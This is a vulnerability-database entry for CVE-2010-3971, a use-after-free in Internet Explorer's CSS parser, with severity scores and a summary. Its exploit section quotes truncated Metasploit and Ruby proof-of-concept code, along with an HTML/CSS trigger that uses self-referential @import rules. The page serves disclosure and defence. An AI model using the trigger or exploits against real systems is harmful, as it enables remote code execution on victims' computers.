9.3
CVSSv2

CVE-2010-3971

Published: 22/12/2010 Updated: 23/07/2021
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 945
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Use-after-free vulnerability in the CSharedStyleSheet::Notify function in the Cascading Style Sheets (CSS) parser in mshtml.dll, as used in Microsoft Internet Explorer 6 through 8 and other products, allows remote malicious users to execute arbitrary code or cause a denial of service (application crash) via a self-referential @import rule in a stylesheet, aka "CSS Memory Corruption Vulnerability."

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft internet explorer 8

microsoft internet explorer 7

Exploits

## # $Id: ms11_003_ie_css_importrb 11730 2011-02-08 23:31:44Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' ...
#!/usr/bin/env ruby # Source: wwwbreakingpointsystemscom/community/blog/ie-vulnerability/ # Author: Nephi Johnson (d0c_s4vage) require 'socket' def http_send(sock, data, opts={}) defaults = {:code=>"200", :message=>"OK", :type=>"text/html"} opts = defaultsmerge(opts) code = opts[:code] message = opts[:mes ...
<code> <div style="position: absolute; top: -999px;left: -999px;"> <link href="csscss" rel="stylesheet" type="text/css" /> </code> <code of csscss> *{ color:red; } @import url("csscss"); @import url("csscss"); @import url("csscss"); @import url("csscss"); </code> Exploit-DB Notes: * Original credit goes ...

Github Repositories

Do you own security hotfix with Deviare hooking

CVE-2010-3971-hotpatch Do you own security hotfix with Deviare Original article: using Deviare to create a temporary zero day patch